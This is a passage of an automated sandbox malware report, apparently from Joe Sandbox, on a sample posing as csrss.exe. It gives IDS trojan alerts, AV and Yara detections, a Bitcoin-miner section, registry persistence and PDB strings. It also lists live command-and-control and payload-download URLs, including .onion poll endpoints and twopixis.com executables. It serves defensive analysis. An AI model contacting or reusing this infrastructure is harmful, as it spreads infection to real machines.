Protocol: UDP
Classtype: A Network Trojan was detected

Timestamp: 05/28/23-11:32:15.763358
Source IP: 192.168.11.20
Destination IP: 185.82.216.50
SID: 2043048
Source Port: 49993
Destination Port: 443
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/28/23-11:32:14.520098
Source IP: 192.168.11.20
Destination IP: 185.82.216.50
SID: 2043048
Source Port: 49990
Destination Port: 443
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/28/23-11:32:24.457669
Source IP: 192.168.11.20
Destination IP: 185.82.216.50
SID: 2043048
Source Port: 49998
Destination Port: 443
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/28/23-11:33:14.485129
Source IP: 192.168.11.20
Destination IP: 185.82.216.50
SID: 2043048
Source Port: 50002
Destination Port: 443
Protocol: TCP
Classtype: A Network Trojan was detected



        AV Detection

Source: kdsyitkxmS.exe | Virustotal: Detection: 31%
Source: kdsyitkxmS.exe | ReversingLabs: Detection: 32%
Source: Yara match | File source: 10.3.kdsyitkxmS.exe.3ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 58.3.csrss.exe.3d00000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000003D.00000003.209030995606.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000003A.00000003.208966850463.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000037.00000003.208942288673.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: kdsyitkxmS.exe PID: 4688, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: kdsyitkxmS.exe PID: 8716, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: csrss.exe PID: 2532, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: csrss.exe PID: 768, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: csrss.exe PID: 7048, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: csrss.exe PID: 8952, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: csrss.exe PID: 9120, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: csrss.exe PID: 7120, type: MEMORYSTR
Source: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollxennHbdeCkATuZ | Avira URL Cloud: Label: malware
Source: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/cdn?c=03d8840b313d | Avira URL Cloud: Label: malware
Source: https://server5.duniadekho.bar/api/signature/21f67ca2e1b8b0405399c65a0e0d031e | Avira URL Cloud: Label: malware
Source: https://duniadekho.bar | Avira URL Cloud: Label: malware
Source: https://server5.duniadekho.bar/api/restriction-usH2 | Avira URL Cloud: Label: malware
Source: https://twopixis.com/w/w-8-debug.exe | Avira URL Cloud: Label: malware
Source: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/poll | Avira URL Cloud: Label: malware
Source: https://twopixis.com/watchdog | Avira URL Cloud: Label: malware
Source: https://twopixis.com/watchdog/watchdog.exe | Avira URL Cloud: Label: malware
Source: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion/api/pollnnHbdeCkATuZNP | Avira URL Cloud: Label: malware
Source: https://server5.duniadekho.bar/api/poll | Avira URL Cloud: Label: malware
Source: https://twopixis.com/wupxarch-6162-dcb505dc2b9d8aac05f4ca0727f5eadb.exe | Avira URL Cloud: Label: malware
Source: https://server5.duniadekho.bar/api/restriction-us | Avira URL Cloud: Label: malware
Source: https://twopixis.com/smbscanlocal-1bf850b4d9587c1017a75a47680584c4.exe | Avira URL Cloud: Label: malware
Source: https://twopixis.com/gm-305-7507ffc9a340f774985cb5ca11ca78c4.exe | Avira URL Cloud: Label: malware
Source: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion | Avira URL Cloud: Label: malware
Source: https://twopixis.com/watchdog/watchdog.exeSETCONF | Avira URL Cloud: Label: malware
Source: https://server5.duniadekho.bar | Avira URL Cloud: Label: malware
Source: https://server5.duniadekho.bar/api/cdn?c=50d7801a966ceaa4&uuid=ec87b504-92ea-4d22-a937-161700799581 | Avira URL Cloud: Label: malware
Source: https://server5.duniadekho.bar/api/signature/ | Avira URL Cloud: Label: malware
Source: http://server5.vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion | Avira URL Cloud: Label: malware
Source: https://twopixis.com/watchdog/watchdog.exeno-store | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | Avira: detection malicious, Label: TR/Agent.twerk
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll | Avira: detection malicious, Label: TR/Redcap.gsjan
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll | ReversingLabs: Detection: 88%
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | ReversingLabs: Detection: 92%
Source: C:\Windows\rss\csrss.exe | ReversingLabs: Detection: 32%
Source: kdsyitkxmS.exe | Joe Sandbox ML: detected

        Bitcoin Miner

Source: Yara match | File source: 10.3.kdsyitkxmS.exe.3ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 58.3.csrss.exe.3d00000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000003D.00000003.209030995606.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000003A.00000003.208966850463.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000037.00000003.208942288673.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: kdsyitkxmS.exe PID: 4688, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: kdsyitkxmS.exe PID: 8716, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: csrss.exe PID: 2532, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: csrss.exe PID: 768, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: csrss.exe PID: 7048, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: csrss.exe PID: 8952, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: csrss.exe PID: 9120, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: csrss.exe PID: 7120, type: MEMORYSTR
Source: kdsyitkxmS.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\rss\csrss.exe | Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Uninstaller
        Source: Binary string: System.Data.pdb source: powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmp
        Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: symsrv.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000004308000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000004328000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004578000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000035.00000002.209062092812.000000006B23F000.00000020.00000001.01000000.00000018.sdmp
        Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Core.ni.pdb source: powershell.exe, 00000035.00000002.209224649761.0000000071891000.00000020.00000001.01000000.0000000A.sdmp
        Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Numerics.ni.pdb source: powershell.exe, 00000035.00000002.209181323602.00000000704F7000.00000020.00000001.01000000.00000011.sdmp
        Source: Binary string: System.Transactions.ni.pdbRSDSc source: powershell.exe, 00000035.00000002.209083403499.000000006B516000.00000020.00000001.01000000.00000015.sdmp
        Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Management.ni.pdbRSDSJ< source: powershell.exe, 00000035.00000002.209104723961.000000006C4B0000.00000020.00000001.01000000.0000000E.sdmp
        Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: symsrv.pdbGCTL source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000004308000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000004328000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004578000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: EfiGuardDxe.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: powershell.exe, 00000035.00000002.209062092812.000000006B23F000.00000020.00000001.01000000.00000018.sdmp
        Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: dbghelp.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: dbghelp.pdbGCTL source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Loader.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: powershell.exe, 00000035.00000002.209085027998.000000006B5CD000.00000020.00000001.01000000.00000014.sdmp
        Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Data.ni.pdb source: powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmp
        Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Numerics.ni.pdbRSDSautg source: powershell.exe, 00000035.00000002.209181323602.00000000704F7000.00000020.00000001.01000000.00000011.sdmp
        Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Unable to locate the .pdb file in this location source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: powershell.exe, 00000035.00000002.209062092812.000000006B23F000.00000020.00000001.01000000.00000018.sdmp
        Source: Binary string: The module signature does not match with .pdb signature. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: .pdb.dbg source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
